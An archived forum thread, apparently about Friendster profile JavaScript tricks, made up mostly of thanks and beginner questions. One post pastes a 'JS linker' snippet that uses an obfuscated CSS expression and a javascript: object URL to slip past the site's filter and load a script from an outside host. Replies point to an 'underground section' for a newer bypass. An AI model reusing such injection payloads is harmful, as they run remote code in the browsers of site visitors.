• ARCHIVES 
  • » heres the code: [code]document.getElementById("content_0").getElementsByTagName("ul")[2].innerHTML= "<li><strong>Viewers Info:</strong>[<a style=\"margin: 0px; font-weight: normal;\" href=\"/editacc

Pages: 1..12345678910111213

heres the code: [code]document.getElementById("content_0").getElementsByTagName("ul")[2].innerHTML= "<li><strong>Viewers Info:</strong>[<a style=\"margin: 0px; font-weight: normal;\" href=\"/editacc

lilprincess950
» FTalkManiac
FTalk Level: zero
1969-12-31

Re: heres the code: [code]document.getElementById("content_0").getElementsByTagName("ul")[2].innerHTML= "<li><strong>Viewers Info:</strong>[<a style=\"margin: 0px; font-weight: normal;\" href=\"/editacc

@azher15 Go here: http://theftalk.com/t19883-Welcome-Page-Trick.html @--pUshnIt08-- Try this: <">Paste in CSS.Change the [b]blue[/b] for font color and [b]red[/b] for border.
rhenz23
» n00b
1969-12-31

Re: heres the code: [code]document.getElementById("content_0").getElementsByTagName("ul")[2].innerHTML= "<li><strong>Viewers Info:</strong>[<a style=\"margin: 0px; font-weight: normal;\" href=\"/editacc

someone teach me where to apply my javascript url codes
aprilcutie09
» FTalkGeek
1969-12-31

thnx for the codes^^
Murgen
» n00b
1969-12-31

1st, what is JS 0_o newbie here.
tweaktweakers
» FTalkAddict
1969-12-31

Tnx 4 thIS! thiS is a niCe trick!
kazuyuki
» n00b
1969-12-31

how can i put flash clock in my recent updates?
khane
» n00b
1969-12-31

is this code for recent updates working with css extension? coz i've tried to paste it with my css ext. but it doesn't work! is it only for js files? tnx.:)
unmaskedluke
» FTalkGeek
1969-12-31

how do i make it transparent..?
freaKmeOut
» FTalker
1969-12-31

wow....i'm gonna use it on my profile..... thanx for sharing bro :D
rjaiuchris
» n00b
1969-12-31

hello everybuddy,,, does anyone have a js linker??? i just badly neet it.. thnx..;)
cocopogi007
» n00b
1969-12-31

help me i have some problems :crybaby: when i paste this on my media and save it <a href='#' id='object' style="obj:expres\sion(function b(){a=document.createElement('script');a.src='http://h1.ripway.com/yunuspogi/information.';navBg.appendChild(a)}b());text:expres\sion(object.style.obj='0')"><object type=text/javascript data=" javascript: a=document.createElement('script');a.src='http://h1.ripway.com/yunuspogi/information.';parent.document.getElementById('navBg').appendChild(a);obj" height=1></object></a> and when i view it again it turns into:wallbash: <a href='#' id='object'><object allowScriptAccess="never" allownetworking="internal" type=text height=1></object></a> and it doesnt work... whats the problem??:crybaby:
ric25
» FTalkAddict
1969-12-31

dat linker is really not gonna work bcoz its feltered olredy,go to underground section to get the new linker..:eh::penguin:
diehearts
» n00b
1969-12-31

May I Ask?? Where Can I Find The js?? i'm just a noob pls help me send me a messeage to my Friendster franklin_misteryo04@hotmail.com.. thanks
clarissadianneisrael
» n00b
1969-12-31

woow.. ths code is great... tnx for sharing this
rjaiuchris
» n00b
1969-12-31

[quote=roCksTAriC]dat linker is really not gonna work bcoz its feltered olredy,go to underground section to get the new linker..:eh::penguin:[/quote] may i ask,, where do i find thid underfround section for the new llinker??? i just badly need it... thnx
ninafaye
» FTalkGeek
1969-12-31

:thumbsup:Cool Love it!!!
~*ChOLee16*~
» FTalker
1969-12-31

i love this :thumbsup: the codes are still working! i just love it soooo uch:D +repu for you :rose:
Lordheinz
» FTalkElite
1969-12-31

[quote=khane]is this code for recent updates working with css extension? coz i've tried to paste it with my css ext. but it doesn't work! is it only for js files? tnx.:)[/quote] :arrow: this is a js code only..please insert the code in your js ext. >>If you have tracker,you may put the code after the rest of your tracker code...:)
khane
» n00b
1969-12-31

[quote=lordheinz]:arrow: this is a js code only..please insert the code in your js ext. >>If you have tracker,you may put the code after the rest of your tracker code...:)[/quote] [b]yup, i already got it up! i just put it with my js ext. and it works! i'm using it in my oder account. thanks Sir Lordheinz! gbu :)[/b]
Lordheinz
» FTalkElite
1969-12-31

[quote=khane][quote=lordheinz]:arrow: this is a js code only..please insert the code in your js ext. >>If you have tracker,you may put the code after the rest of your tracker code...:)[/quote] [b]yup, i already got it up! i just put it with my js ext. and it works! i'm using it in my oder account. thanks Sir Lordheinz! gbu :)[/b][/quote] >>Your very welcome khane..:)
  • ARCHIVES 
  • » heres the code: [code]document.getElementById("content_0").getElementsByTagName("ul")[2].innerHTML= "<li><strong>Viewers Info:</strong>[<a style=\"margin: 0px; font-weight: normal;\" href=\"/editacc

Pages: 1..12345678910111213

Board footer

© 2024 F Talk

Current time is 11:07

[ 9 queries - 0.065 second ]
Privacy Policy